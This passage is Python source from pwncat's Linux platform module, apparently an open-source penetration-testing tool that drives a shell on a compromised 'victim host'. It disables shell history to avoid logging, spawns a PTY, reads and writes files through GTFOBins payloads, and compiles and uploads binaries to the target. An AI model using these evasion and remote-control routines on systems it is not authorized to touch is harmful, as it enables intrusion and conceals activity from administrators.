"""
The Linux platform provides Linux shell support ontop of any channel.
The Linux platform expects the channel to expose a shell whose stdio
is connected directly to the channel IO. At a minimum stdin and stdout
must be connected.

Because of the way this platform interacts with the shell directly,
it is not able to manage multiple active processes. Only as single
Popen can be running at a time. It is imperative that you call
``Popen.wait`` or wait for ``Popen.poll`` to return non-Null prior
to calling any other pwncat methods.
"""
import os
import stat
import time
import shlex
import shutil
import hashlib
import pathlib
import tempfile
import subprocess
from io import TextIOWrapper, BufferedIOBase, UnsupportedOperation
from typing import List, Union, BinaryIO, Optional, Generator
from subprocess import TimeoutExpired, CalledProcessError

import pkg_resources

import pwncat
import pwncat.channel
import pwncat.subprocess
from pwncat import util
from pwncat.gtfobins import Stream, GTFOBins, Capability, MissingBinary
from pwncat.platform import Path, Platform, PlatformError


class PopenLinux(pwncat.subprocess.Popen):
    """
    Linux-specific Popen wrapper class.
    """

    def __init__(
        self,
        platform: Platform,
        args,
        stdout,
        stdin,
        text,
        encoding,
        errors,
        bufsize,
        start_delim: bytes,
        end_delim: bytes,
        code_delim: bytes,
    ):
        super().__init__()

        self.platform: Platform = platform
        self.start_delim: bytes = start_delim
        self.end_delim: bytes = end_delim
        self.code_delim: bytes = code_delim
        self.args = args

        # Create a reader-pipe
        if stdout == pwncat.subprocess.PIPE:
            self.stdout_pipe = True

        if text or encoding is not None or errors is not None:
            line_buffering = bufsize == 1
            bufsize = -1

        # We create a stdout pipe regardless. This is how we
        # track whether the process has completed.
        self.stdout_raw = platform.channel.makefile(
            "r", bufsize=bufsize, sof=start_delim, eof=end_delim
        )

        if text or encoding is not None or errors is not None:
            self.stdout = TextIOWrapper(
                self.stdout_raw,
                line_buffering=line_buffering,
                encoding=encoding,
                errors=errors,
            )
        else:
            # We want a binary stream, so just copy the reference
            self.stdout = self.stdout_raw

        # Create the writer-pipe if requested
        if stdin == pwncat.subprocess.PIPE:
            self.stdin_raw = platform.channel.makefile("w")
            if text or encoding is not None or errors is not None:
                self.stdin = TextIOWrapper(
                    self.stdin_raw, encoding=encoding, errors=errors, write_through=True
                )
            else:
                self.stdin = self.stdin_raw

    def detach(self):

        # Indicate the process is complete
        self.returncode = 0

        # Close file descriptors to prevent further interaction
        if self.stdout is not None:
            self.stdout.close()
        if self.stdin is not None:
            self.stdin.close()
        if self.stdout_raw is not None:
            self.stdout_raw.close

        # Hope they know what they're doing...
        self.platform.command_running = None

    def poll(self):

        if self.returncode is not None:
            return self.returncode

        if self.stdin is not None:
            try:
                self.stdin.flush()
            except ValueError:
                pass

        # This gets a 'lil... funky... Normally, the `ChannelFile`
        # wraps a non-blocking socket in a blocking file object
        # because this is what we normally want and it allows us
        # to implement our own timeouts. However, here we want
        # a non-blocking call to check for EOF, so we set the
        # internal ``blocking`` flag to False which can cause
        # a `BlockingIOError` caught below. We need to do this
        # in a nested `try-finally` so we guarantee catching it
        # and resetting the flag before calling `_receive_returncode`.
        try:
            try:
                self.stdout_raw.raw.blocking = False
                result = self.stdout_raw.peek(len(self.end_delim))
            finally:
                self.stdout_raw.raw.blocking = False

            if result == b"" and self.stdout_raw.raw.eof:
                self._receive_returncode()
                return self.returncode
        except ValueError:
            self._receive_returncode()
            return self.returncode
        except BlockingIOError:
            return None

    def wait(self, timeout: float = None):

        if timeout is not None:
            end_time = time.time() + timeout
        else:
            end_time = None

        while self.poll() is None:
            if end_time is not None and time.time() >= end_time:
                raise TimeoutExpired(self.args, timeout)

            time.sleep(0.1)

            # Flush more data to look for the EOF
            try:
                self.stdout_raw.read1(4096)
            except BlockingIOError:
                pass

        return self.returncode

    def communicate(self, input=None, timeout=None):

        if self.stdout is self.stdout_raw:
            empty = b""
        else:
            empty = ""

        if self.returncode is not None:
            return (empty, empty)

        if input is not None and self.stdin is not None:
            self.stdin.write(input)

        if timeout is not None:
            end_time = time.time() + timeout
        else:
            end_time = None

        data = empty

        while self.poll() is None:
            try:
                if end_time is not None and time.time() >= end_time:
                    raise TimeoutExpired(self.args, timeout, data)
                if self.stdout is not None and data is None:
                    data = self.stdout.read(4096)
                elif self.stdout is not None:
                    new_data = self.stdout.read(4096)
                    if new_data is not None:
                        data += new_data
                else:
                    # A pipe wasn't requested. Don't buffer the data.
                    self.stdout_raw.read1(4096)
            except BlockingIOError:
                time.sleep(0.1)

        # Check if there's any data left buffered
        if self.stdout:
            new_data = self.stdout.read()
            if new_data is not None:
                data += new_data

        return (data, empty)

    def kill(self):

        if self.returncode is not None:
            return

        # Kill the process (SIGINT)
        self.platform.channel.send(util.CTRL_C * 2)
        self.returncode = -1
        self.platform.command_running = None

    def terminate(self):

        if self.returncode is not None:
            return

        # Terminate the process (SIGQUIT)
        self.platform.channel.send(b"\x1C\x1C")
        self.returncode = -1
        self.platform.command_running = None

    def _receive_returncode(self):
        """All output has been read of the stream, now we read
        the return code."""

        # Read until the returncode delimiter
        code = self.platform.channel.recvuntil(self.code_delim)
        code = code.split(self.code_delim)[0]
        code = code.strip().decode("utf-8")

        # This command has finished
        self.platform.command_running = None

        try:
            self.returncode = int(code)
        except ValueError:
            # This shouldn't happen, but if it does, there's nothing
            # we can do.
            self.returncode = 0


class LinuxReader(BufferedIOBase):
    """
    A file-like object which wraps a Popen object to enable reading a
    remote file.
    """

    def __init__(self, popen, on_close=None, name: str = None):
        super().__init__()

        self.popen = popen
        self.on_close = on_close
        self.name = name

    def readable(self):
        if self.popen is None:
            return False
        return True

    def writable(self):
        return False

    def detach(self):
        """Detach the underlying process and return the Popen object"""

        popen = self.popen
        self.popen = None

        return popen

    def read(self, size: int = -1):
        """Read data from the file"""

        if self.popen is None:
            raise UnsupportedOperation("reader is detached")

        result = None
        while result is None:
            result = self.popen.stdout.read(size)

        return result

    def read1(self, size: int = -1):
        """Read data w/ 1 call to underlying buffer"""

        if self.popen is None:
            raise UnsupportedOperation("reader is detached")

        result = None
        while result is None:
            result = self.popen.stdout.read1(size)

        return result

    def readinto(self, b):
        """Read data w/ 1 call to underlying buffer"""

        if self.popen is None:
            raise UnsupportedOperation("reader is detached")

        result = None
        while result is None:
            result = self.popen.stdout.readinto(b)
        return result

    def readinto1(self, b):
        """Read data w/ 1 call to underlying buffer"""

        if self.popen is None:
            raise UnsupportedOperation("reader is detached")

        result = None
        while result is None:
            result = self.popen.stdout.readinto1(b)

        return result

    def close(self):
        """Close the file and stop the process"""

        if self.popen is None:
            raise UnsupportedOperation("reader is detached")

        if self.on_close is not None:
            self.on_close(self)

        try:
            self.popen.wait(timeout=0.1)
        except TimeoutExpired:
            self.popen.terminate()
            self.popen.wait()

        # This happens immediately upon the first read attempt because the process will have
        # exited. During testing, this seems reliable. It's not ideal, but we don't know what
        # the remote process is...
        if self.popen.returncode != 0:
            raise PermissionError(self.name)

        self.detach()


class LinuxWriter(BufferedIOBase):
    """A wrapper around an active Popen object which is writing to
    a file. Remote files are not seekable, and cannot be simultaneous
    read/write."""

    CONTROL_CODES = [
        0x00,
        0x01,
        0x02,
        0x03,
        0x04,
        0x05,
        0x06,
        0x07,
        0x0C,
        0x0E,
        0x0F,
        0x10,
        0x11,
        0x12,
        0x13,
        0x14,
        0x15,
        0x16,
        0x17,
        0x18,
        0x19,
        0x1A,
        0x1B,
        0x1C,
        0x1D,
        0x1E,
        0x1F,
        0x7F,
    ]

    def __init__(self, popen, on_close=None, name: str = None):
        super().__init__()

        self.popen = popen
        self.last_byte = None
        self.since_newline = 0
        self.on_close = on_close
        self.name = name

    def readable(self):
        return False

    def writable(self):
        return True

    def detach(self):
        """Detach the underlying process and return the Popen object"""

        popen = self.popen
        self.popen = None

        return popen

    def write(self, b):
        """Write data to the underlying Popen stdin.
        This translates any control-sequences into escaped control
        sequences, because it assumes you are trying to write to a file
        and not control the terminal.
        """

        if self.popen is None:
            raise UnsupportedOperation("writer is detached")

        if self.popen.poll() is not None:
            raise PermissionError("file write failed")

        if self.popen.platform.has_pty:
            # Control sequences need escaping
            translated = []
            for idx, c in enumerate(b):

                # Track when the last new line was
                if c == 0x0A:
                    self.since_newline = 0
                else:
                    self.since_newline += 1

                # Escape control characters
                if c in LinuxWriter.CONTROL_CODES:
                    translated.append(0x16)

                # Track all characters in translated buffer
                translated.append(c)

                if self.since_newline >= 2048:
                    # Flush read immediately to prevent truncation of line
                    translated.append(0x04)
                    self.since_newline = 0

            self.last_byte = bytes([translated[-1]])

            self.popen.stdin.write(bytes(translated))
        else:
            self.popen.stdin.write(b)

        return len(b)

    def close(self):
        """Close the file and stop the process"""

        if self.popen is None:
            return

        self.flush()
        self.popen.stdin.flush()

        if self.on_close is not None:
            self.on_close(self)

        # We don't want to send CTRL-D if the process already
        # exited, so we do a poll first
        if self.popen.poll() is not None:
            self.detach()
            return

        # Trigger EOF in remote process
        self.popen.platform.channel.send(b"\x04")
        self.popen.platform.channel.send(b"\x04")
        if self.since_newline != 0:
            self.popen.platform.channel.send(b"\x04")
            self.popen.platform.channel.send(b"\x04")

        # Wait for the process to exit
        try:
            self.popen.wait()
        except KeyboardInterrupt:
            # We *should* wait for the process to send the return codes.
            # however, if the user wants to stop this process, we should
            # at least attempt to do whatever cleanup we can.
            self.popen.kill()
            self.popen.wait()

        # This happens immediately upon the first read attempt because the process will have
        # exited. During testing, this seems reliable. It's not ideal, but we don't know what
        # the remote process is...
        if self.popen.returncode != 0:
            raise PermissionError(self.name)

        # Ensure we don't touch stdio again
        self.detach()


class LinuxPath(pathlib.PurePosixPath):
    """Special cases for Linux remote paths"""

    def readable(self):
        """Test if a file is readable"""

        uid = self._target._id["euid"]
        gid = self._target._id["egid"]
        groups = self._target._id["groups"]

        file_uid = self.stat().st_uid
        file_gid = self.stat().st_gid
        file_mode = self.stat().st_mode

        if uid == file_uid and (file_mode & stat.S_IRUSR):
            return True
        elif (gid == file_gid or file_gid in groups) and (file_mode & stat.S_IRGRP):
            return True
        elif file_mode & stat.S_IROTH:
            return True

        return False

    def writable(self):

        uid = self._target._id["euid"]
        gid = self._target._id["egid"]
        groups = self._target._id["groups"]

        file_uid = self.stat().st_uid
        file_gid = self.stat().st_gid
        file_mode = self.stat().st_mode

        if uid == file_uid and (file_mode & stat.S_IWUSR):
            return True
        elif (gid == file_gid or file_gid in groups) and (file_mode & stat.S_IWGRP):
            return True
        elif file_mode & stat.S_IWOTH:
            return True

        return False


class Linux(Platform):
    """
    Concrete platform class abstracting interaction with a GNU/Linux remote
    host. See the base class (``pwncat.platform.Platform``) for more
    information on the implemented methods and interface definition.
    """

    name = "linux"
    PATH_TYPE = LinuxPath
    PROMPTS = {
        "sh": """'$(command printf "(remote) $(whoami)@$(hostname):$PWD\\$ ")'""",
        "dash": """'$(command printf "(remote) $(whoami)@$(hostname):$PWD\\$ ")'""",
        "zsh": """'%B%F{red}(remote) %B%F{yellow}%n@%M%B%F{reset}:%B%F{cyan}$PWD%B%(#.%b%F{white}#.%b%F{white}$)%b%F{reset} '""",
        "default": """'$(command printf "\\[\\033[01;31m\\](remote)\\[\\033[0m\\] \\[\\033[01;33m\\]$(whoami)@$(hostname)\\[\\033[0m\\]:\\[\\033[1;36m\\]$PWD\\[\\033[0m\\]\\$ ")'""",
    }

    def __init__(self, session, channel: pwncat.channel.Channel, *args, **kwargs):
        super().__init__(session, channel, *args, **kwargs)

        # Name of this platform. This stored in the database and used
        # to match modules to this platform.
        self.name = "linux"
        self.command_running = None

        self._id = None

        # This causes an stty to be sent.
        # If we aren't in a pty, it doesn't matter.
        # if we are, we need this stty to properly handle process IO
        self._interactive = True
        self.interactive = False

        # Load a GTFOBins database to assist in common operations
        # without relying on specific binaries being available.
        self.gtfo = GTFOBins(
            pkg_resources.resource_filename("pwncat", "data/gtfobins.json"), self.which
        )

        # Ensure history is disabled
        self.disable_history()

        # List of paths that should basically always be in our PATH
        wanted_paths = [
            "/bin",
            "/usr/bin",
            "/usr/local/bin",
            "/sbin",
            "/usr/sbin",
            "/usr/local/sbin",
        ]

        # Build a good PATH
        remote_path = [p for p in self.getenv("PATH").split(":") if p != ""]
        normalized = False
        for p in wanted_paths:
            if p not in remote_path:
                remote_path.append(p)
                normalized = True

        if normalized:
            # Set the path
            self.session.log("normalizing shell path")
            self.setenv("PATH", ":".join(remote_path), export=True)

        p = self.Popen("[ -t 1 ]")
        if p.wait() == 0:
            self.has_pty = True
        else:
            self.has_pty = False

        if self.shell == "" or self.shell is None:
            self.shell = "/bin/sh"

        if self._do_which("which") is None:
            self._do_which = self._do_custom_which

        better_shells = ["bash", "zsh", "ksh", "fish"]
        if os.path.basename(self.shell) not in better_shells:
            # Try to find a better shell
            # a custom `pwncat shell prompt` may not be available for all shells
            # see `self.PROMPTS`

            for better_shell in better_shells:
                shell = self._do_which(better_shell)

                if shell is not None:
                    self.session.log(f"upgrading from {self.shell} to {shell}")
                    self.shell = shell
                    self.channel.sendline(f"exec {self.shell}".encode("utf-8"))
                    time.sleep(0.5)
                    break

        self.refresh_uid()

    def exit(self):
        """Exit this session"""

        self.channel.send(b"exit\n")

    def disable_history(self):
        """Disable shell history"""

        # Ensure history is not tracked
        self.run("unset HISTFILE; export HISTCONTROL=ignorespace; unset PROMPT_COMMAND")

    def get_pty(self):
        """Spawn a PTY in the current shell. If a PTY is already running
        then this method does nothing."""

        PTY_OPTIONS = [
            (["script"], " {binary_path} -qc {shell} /dev/null 2>&1"),
            (
                [
                    "python",
                    "python2",
                    "python2.7",
                    "python3",
                    "python3.6",
                    "python3.8",
                    "python3.9",
                ],
                """ {binary_path} -c "import pty; pty.spawn('{shell}')" 2>&1""",
            ),
        ]

        # Check if we are currently in a PTY
        if self.has_pty:
            return

        # Grab the current shell PID
        pid = self.getenv("$")

        for binaries, payload_format in PTY_OPTIONS:
            for binary in binaries:
                binary_path = self.which(binary)
                if binary_path is None:
                    continue

                payload = payload_format.format(
                    binary_path=binary_path, shell=self.shell
                )

                # Send the payload
                self.logger.info(payload)
                self.channel.sendline(payload.encode("utf-8"))

                # Preserve interactivity. This has to happen for `getenv` to function
                # It should do no harm if the pty method failed
                self.has_pty = True
                if not self.interactive:
                    self._interactive = True
                    self.interactive = False

                # Seemed to work
                new_pid = self.getenv("$")
                if new_pid != pid:
                    break

                # We failed, reset the flag
                self.has_pty = False
            else:
                continue
            break
        else:
            raise PlatformError("no available pty methods")

        # When starting a pty, history is sometimes re-enabled
        self.disable_history()

        # Ensure that the TTY settings make sense
        self.Popen(
            [
                "stty",
                "400:1:bf:8a33:3:1c:7f:15:4:0:1:0:11:13:1a:0:12:f:17:16:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0",
            ],
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
        ).wait()

    def get_host_hash(self) -> str:
        """
        Retrieve a string which uniquely identifies this victim host. On Unix-like
        platforms, this retrieves the hostname and MAC addresses of any available
        network interfaces and computes a hash, which should be unique regardless of
        connection method.

        :return: a unique string (normally a hash) identifying this host
        :rtype: str
        """

        with self.session.task("calculating host hash") as task:
            try:
                self.session.update_task(
                    task, status="retrieving hostname (hostname -f)"
                )
                result = self.run(
                    "hostname -f", shell=True, check=True, text=True, encoding="utf-8"
                )
                hostname = result.stdout.strip()
            except CalledProcessError:
                hostname = self.channel.host

            try:
                self.session.update_task(
                    task, status="retrieving mac addresses (ifconfig)"
                )
                result = self.run(
                    "ifconfig -a", shell=True, check=True, text=True, encoding="utf-8"
                )
                ifconfig = result.stdout.strip().lower()

                for line in ifconfig.split("\n"):
                    if "hwaddr" in line and "00:00:00:00:00:00" not in line:
                        mac = line.split("hwaddr ")[1].split("\n")[0].strip()
                        break
                    if "ether " in line and "00:00:00:00:00:00" not in line:
                        mac = line.split("ether ")[1].split(" ")[0]
                        break
                else:
                    mac = None
            except CalledProcessError:
                # Attempt to use the `ip` command instead
                try:
                    self.session.update_task(
                        task, status="retrieving mac addresses (ip link show)"
                    )
                    result = self.run(
                        "ip link show",
                        shell=True,
                        check=True,
                        text=True,
                        encoding="utf-8",
                    )
                    ip_out = result.stdout.strip().lower()
                    for line in ip_out.split("\n"):
                        if "link/ether" in line and "00:00:00:00:00:00" not in line:
                            mac = line.split("link/ether ")[1].split(" ")[0]
                            break
                    else:
                        mac = None
                except CalledProcessError:
                    mac = None

        # In some (unlikely) cases, `mac` may be None, so we use `str` here.
        identifier = hostname + str(mac)
        return hashlib.md5(identifier.encode("utf-8")).hexdigest()

    def listdir(self, path=None) -> Generator[str, None, None]:
        """List the contents of a directory. If ``path`` is None,
        then the contents of the current directory is listed. The
        list is not guaranteed to be sorted in any way.

        :param path: the directory to list
        :type path: str or Path-like
        :raise FileNotFoundError: When the requested directory is not a directory,
          does not exist, or you do not have execute permissions.
        """

        try:
            p = self.run(
                ["ls", "--all", "-1", "--color=never", path],
                encoding="utf-8",
                capture_output=True,
                check=True,
            )
        except CalledProcessError:
            return

        for name in p.stdout.split("\n"):
            yield name

    def _do_custom_which(self, name: str):
        """This is custom which implementation that will not find built-in commands.
        It is altogether inferior to the real which, but if `which` isn't available,
        it will do the job."""

        try:
            result = self.run(
                f"""IFS=':'; for path in $PATH; do if [ -f "$path/{name}" ]; then echo "$path/{name}"; break; fi; done; IFS=' '""",
                shell=True,
                capture_output=True,
                check=True,
                text=True,
            )
            if result.stdout.rstrip("\n") == "":
                return None
            return result.stdout.rstrip("\n")
        except CalledProcessError:
            return None

    def _do_which(self, name: str) -> str:
        """
        Locate the specified binary on the remote host. Normally, this is done through
        the local `which` command on the remote host (for unix-like hosts), but can be
        located by any means. The returned path string is guaranteed to exist on the
        remote host and provide the capabilities of the requested binary.

        :param name: name of the binary (e.g. "tar" or "dd")
        :type name: str
        :return: full path to the requested binary
        :rtype: str
        :raises: FileNotFoundError: the requested binary does not exist on this host
        """

        try:
            result = self.run(
                ["which", name], text=True, capture_output=True, check=True
            )
            return result.stdout.rstrip("\n")
        except CalledProcessError:
            return None

    def refresh_uid(self):
        """Retrieve the current user ID"""

        try:
            # NOTE: this is probably not great... but sometimes it fails when transitioning
            # states, and I can't pin down why. The second time normally succeeds, and I've
            # never observed it hanging for any significant amount of time.
            while True:
                try:
                    proc = self.run(
                        "(id -ru;id -u;id -rg;id -g;id -G;)",
                        capture_output=True,
                        text=True,
                        check=True,
                    )
                    idents = proc.stdout.split("\n")
                    self._id = {
                        "ruid": int(idents[0].strip()),
                        "euid": int(idents[1].strip()),
                        "rgid": int(idents[2].strip()),
                        "egid": int(idents[3].strip()),
                        "groups": [int(g.strip()) for g in idents[4].split(" ")],
                    }
                    return self._id["ruid"]
                except ValueError:
                    continue
        except CalledProcessError as exc:
            raise PlatformError(str(exc)) from exc

    def getuid(self):
        """Retrieve the current cached uid"""
        return self._id["ruid"]

    def getenv(self, name: str):

        try:
            proc = self.run(f"echo ${name}", capture_output=True, text=True, check=True)
            return proc.stdout.rstrip("\n")
        except CalledProcessError:
            return ""

    def setenv(self, name: str, value: str, export: bool = False):
        """Set an environment variable in the shell.

        :param name: the name of the environment variable
        :type name: a string representing a valid shell variable name
        :param value: the value of the variable
        :type value: str
        :param export: whether to export the new value
        :type export: bool
        """

        command = []
        if export:
            command.append("export")
        command.append(f"{pwncat.util.quote(name)}={pwncat.util.quote(value)}")
        self.run(command, capture_output=False, check=True)

    def compile(
        self,
        sources: List[Union[str, BinaryIO]],
        output: str = None,
        suffix: str = None,
        cflags: List[str] = None,
        ldflags: List[str] = None,
    ) -> str:
        """
        Attempt to compile the given C source files into a binary suitable for the remote
        host. If a compiler exists on the remote host, prefer compilation locally. If no
        compiler exists on the remote remote host, check the `cross` global config variable
        for the path to a local compiler capable of generating binaries for the remote host.
        If the binary is compiled locally, it is automatically uploaded to the remote host.
        The path to the new binary on the victim is returned.

        :param sources: list of source file paths or IO streams used as source files
        :type sources: List[Union[str, io.IOBase]]
        :param output: base name of the output file. If not specified, a name is randomly generated.
        :type output: str
        :param suffix: a suffix to add to the output name.
        :type suffix: str
        :param cflags: a list of flags to pass to the compiler
        :type cflags: List[str]
        :param ldflags: a list of flags to pass to the linker
        :type ldflags: List[str]
        :return: str
        :raises NotImplementedError: this platform does not support c compilation
        :raises PlatformError: no local or cross compiler detected or compilation failed
        """

        # This is stupid, but we have a circular import because everything is based on
        # platforms
        from pwncat.facts.tamper import CreatedFile

        if cflags is None:
            cflags = []
        if ldflags is None:
            ldflags = []

        try:
            cross = self.session.config["cross"]
        except KeyError:
            cross = None

        try:
            # We need to know the architecture to compile for it
            arch_fact = self.session.run("enumerate", types=["system.arch"])[0]
        except IndexError:
            arch_fact = None

        if cross is not None and os.path.isfile(cross) and arch_fact is not None:
            # Attempt compilation locally
            real_sources = []
            local_temps = []

            # First, ensure all files are on disk, and keep track of local temp files we
            # need to remove later.
            for source in sources:
                if isinstance(source, str):
                    if not os.path.isfile(source):
                        raise FileNotFoundError(f"{source}: No such file or directory")
                    real_sources.append(source)
                else:
                    with tempfile.NamedTemporaryFile(
                        mode="w", suffix=".c", delete=False
                    ) as filp:
                        filp.write(source.read())
                        real_sources.append(filp.name)
                        local_temps.append(filp.name)

            # Next, ensure we have a valid temporary file location locally for the output file with
            # the correct suffix. We will upload with the requested name in a moment
            with tempfile.NamedTemporaryFile("w", suffix=suffix, delete=False) as filp:
                filp.write("\n")
                local_output = filp.name

            # Build the GCC command needed to compile
            command = [
                cross,
                f"-march={arch_fact.arch.replace('_', '-')}",
                "-o",
                local_output,
                *cflags,
                *real_sources,
                *ldflags,
            ]

            # Run GCC and grab the output
            try:
                subprocess.run(command, check=True, capture_output=True)
            except subprocess.CalledProcessError as exc:
                raise PlatformError(str(exc)) from exc
            finally:
                for path in local_temps:
                    os.unlink(path)

            # We have a compiled executable. We now need to upload it.
            os.path.getsize(local_output)
            with open(local_output, "rb") as source:
                # Decide on a name
                if output is not None:
                    dest = self.open(output, "wb")
                    remote_path = output
                else:
                    # We don't care where it goes, make a tempfile
                    dest = self.tempfile(suffix=suffix, mode="wb")
                    remote_path = dest.name

                with dest:
                    shutil.copyfileobj(source, dest)

            try:
                self.run(["chmod", "+x", remote_path], check=True)
            except pwncat.subprocess.CalledProcessError:
                self.session.log(
                    "[yellow]warning[/yellow]: failed to set executable bit on compiled binary"
                )

            return remote_path

        # Do we even have a remote compiler?
        gcc = self.which("gcc")
        if gcc is None:
            raise PlatformError("no gcc found on target")

        # We have a remote compiler. We need to get the sources to the remote host
        real_sources = []
        for source in sources:
            # Upload or write data
            if isinstance(source, str):
                with open(source, "rb") as src:
                    with self.tempfile(suffix=".c", mode="wb") as dest:
                        shutil.copyfileobj(src, dest)
                        real_sources.append(dest.name)
            else:
                with self.tempfile(mode="w", suffix=".c") as dest:
                    shutil.copyfileobj(source, dest)
                    real_sources.append(dest.name)

        if output is None:
            # We just need to create a file...
            with self.tempfile(suffix=suffix, mode="w") as filp:
                output = filp.name

        # Build the command
        command = [gcc, "-o", output, *cflags, *real_sources, *ldflags]

        try:
            self.run(command, check=True)
        except pwncat.subprocess.CalledProcessError:
            self.run(["rm", "-f", output])
            raise PlatformError("compilation failed")
        finally:
            try:
                self.run(["rm", "-f", *real_sources], check=True)
            except pwncat.subprocess.CalledProcessError:
                # Removing sources failed. Add them as tampers
                for source in real_sources:
                    self.session.register_fact(
                        CreatedFile(
                            source="platform.compile", uid=self.getuid(), path=source
                        )
                    )

        return output

    def Popen(
        self,
        args,
        bufsize=-1,
        stdin=None,
        stdout=None,
        stderr=None,
        shell=False,
        cwd=None,
        encoding=None,
        text=None,
        errors=None,
        env=None,
        bootstrap_input=None,
        send_command=None,
        **other_popen_kwargs,
    ) -> pwncat.subprocess.Popen:
        """
        Execute a process on the remote host with an interface similar to
        that of the python standard ``subprocess.Popen``. The returned
        object behaves much like a standard ``Popen`` object and conforms
        to the interface defined by ``pwncat.subprocess.Popen``. For
        an explanation of arguments, see ``pwncat.subprocess.Popen``.
        """

        if self.interactive:
            raise PlatformError(
                "cannot open non-interactive process in interactive mode"
            )

        if isinstance(args, list):
            command = shlex.join(args)
        elif isinstance(args, str):
            command = args
        else:
            raise ValueError("expected a command string or list of arguments")

        if self.command_running is not None:
            raise PlatformError(
                f"attempting to run {repr(command)} during execution of {self.command_running.args}!"
            )

        # This breaks `euid` situations. Not all shells support -p, so I think just not
        # using this is a better option. I'm leaving it here just in case removing it
        # causes problems in the future. Tests seem positive so far.
        # if shell:
        #     # Ensure this works normally
        #     command = shlex.join(["/bin/sh", "-c", command])

        if cwd is not None:
            command = f"(cd {cwd} && {command})"

        if env is not None:
            command = (
                " ".join(
                    [
                        f"{util.quote(name)}={util.quote(value)}"
                        for name, value in env.items()
                    ]
                )
                + " "
                + command
            )

        if isinstance(stdout, str):
            command += f" >{stdout}"
        elif stdout == pwncat.subprocess.DEVNULL:
            command += " >/dev/null"

        if isinstance(stderr, str):
            command += f" 2>{stderr}"
        elif stderr == pwncat.subprocess.DEVNULL:
            command += " 2>/dev/null"

        if isinstance(stdin, str):
            command += f" 0<{stdin}"
        elif stdin == pwncat.subprocess.DEVNULL:
            command += " 0</dev/null"
        elif stdin != pwncat.subprocess.PIPE:
            # if a process requests stdin but we aren't expecting it
            # things can get wonky. We prevent that by kill stdin unless
            # explicitly asked for.
            command += " 0</dev/null"

        # Generate delimeters
        start_delim = util.random_string(10)
        end_delim = util.random_string(10)
        code_delim = util.random_string(10)

        commands = []
        commands.append(" export PS1=")
        commands.append(
            f"echo; echo {start_delim}; {command}; R=$?; echo {end_delim}; echo $R; echo {code_delim}"
        )

        # Build the final command
        command = ";".join(commands).encode("utf-8")

        # Send the command
        if send_command is None:
            self.channel.send(command + b"\n")
        else:
            send_command(command + b"\n")

        # Send bootstraping input if provided
        if bootstrap_input is not None:
            self.channel.send(bootstrap_input)

        # Log the command
        self.logger.info(command.decode("utf-8"))

        popen = PopenLinux(
            self,
            args,
            stdout,
            stdin,
            text,
            encoding,
            errors,
            bufsize,
            start_delim.encode("utf-8") + b"\n",
            end_delim.encode("utf-8") + b"\n",
            code_delim.encode("utf-8") + b"\n",
        )
        self.command_running = popen

        return popen

    def chdir(self, path: Union[str, Path]):
        """
        Change directories to the given path. This method returns the current
        working directory prior to the change.

        :param path: a relative or absolute path to change to
        :type path: Union[str, pwncat.platform.Path]
        :return: current working directory prior to the change
        :raises:
          FileNotFoundError: the specified path doesn't exist
          NotADirectoryError: the specified path is not a directory
        """

        try:
            proc = self.run(
                f'pwd ; cd "{path}"',
                text=True,
                capture_output=True,
                check=True,
            )
            return proc.stdout.strip()
        except CalledProcessError:
            raise FileNotFoundError(str(path))

    def open(
        self,
        path: Union[str, Path],
        mode: str = "r",
        buffering: int = -1,
        encoding: str = "utf-8",
        errors: str = None,
        newline: str = None,
    ):
        """
        Open a remote file for reading or writing. Normally, only one of read or
        write modes are allowed for a remote file, but this may change with
        future platforms. It is recommended to only use one mode when opening
        remote files. This method attempts to replicate the built-in ``open``
        function and returns a file-like object. The `b` mode is honored and
        if not present, a TextIOWrapper is used to wrap the file object to ensure
        text data is returned.

        :param path: path to the file
        :type path: Union[str, pwncat.platform.Path]
        :param mode: the open-mode (see built-in ``open``)
        :type mode: str
        :return: a file-like object
        """

        # Ensure no invalid overlap of modes
        if "r" in mode and "w" in mode:
            raise PlatformError("mixed read/write streams are not supported")

        # Ensure all mode properties are valid
        if any(c not in "rwb" for c in mode):
            raise PlatformError(f"{mode}: unknown file mode")

        if isinstance(path, str):
            path = self.Path(path)

        if "r" in mode and not path.exists():
            raise FileNotFoundError(f"No such file or directory: {str(path)}")
        if "r" in mode and not path.readable():
            raise PermissionError(f"Permission Denied: {str(path)}")

        if "w" in mode:
            parent = path.parent

            if "w" in mode and path.exists() and not path.writable():
                raise PermissionError(f"Permission Denied: {str(path)}")
            if "w" in mode and not path.exists() and not parent.writable():
                raise PermissionError(f"Permission Denied: {str(path)}")
            if "w" in mode and not path.exists() and not parent.exists():
                raise FileNotFoundError(f"No such file or directory: {str(path)}")

        # Save this just in case we are opening a text-mode stream
        line_buffering = buffering == -1 or buffering == 1

        # For text-mode files, use default buffering for the underlying binary
        # stream.
        if "b" not in mode:
            buffering = -1

        if "w" in mode:

            for method in self.gtfo.iter_methods(
                caps=Capability.WRITE, stream=Stream.RAW
            ):
                try:
                    payload, input_data, exit_cmd = method.build(
                        gtfo=self.gtfo, lfile=path, suid=True
                    )
                    break
                except MissingBinary:
                    pass
            else:
                raise PlatformError("no available gtfobins writers")

            popen = self.Popen(
                payload,
                shell=True,
                stdin=pwncat.subprocess.PIPE,
                bufsize=buffering,
                bootstrap_input=input_data.encode("utf-8"),
            )

            stream = LinuxWriter(
                popen,
                on_close=lambda filp: filp.popen.platform.channel.send(
                    exit_cmd.encode("utf-8")
                ),
                name=path,
            )
        else:
            for method in self.gtfo.iter_methods(
                caps=Capability.READ, stream=Stream.RAW
            ):
                try:
                    payload, input_data, exit_cmd = method.build(
                        gtfo=self.gtfo, lfile=path, suid=True
                    )
                    break
                except MissingBinary:
                    pass
            else:
                raise PlatformError("no available gtfobins writers")

            popen = self.Popen(
                payload,
                shell=True,
                stdin=pwncat.subprocess.PIPE,
                bufsize=buffering,
                bootstrap_input=input_data.encode("utf-8"),
            )

            stream = LinuxReader(
                popen,
                on_close=lambda filp: filp.popen.platform.channel.send(
                    exit_cmd.encode("utf-8")
                ),
                name=path,
            )

        if "b" not in mode:
            stream = TextIOWrapper(
                stream,
                encoding=encoding,
                errors=errors,
                newline=newline,
                write_through=True,
                line_buffering=line_buffering,
            )

        return stream

    def tempfile(
        self,
        length: Optional[int] = None,
        suffix: Optional[str] = None,
        directory: Optional[str] = None,
        **kwargs,
    ):
        """
        Create a temporary file on the remote host and open it with the specified mode.
        Creating a new temporary file with a mode other than "w" is mostly useless,
        however ``mode`` can be used to specify a binary or text-mode file. The length
        argument is useful if you know the length of file you are about to read. This
        alleviates some situations which could be complicated on some platforms by not
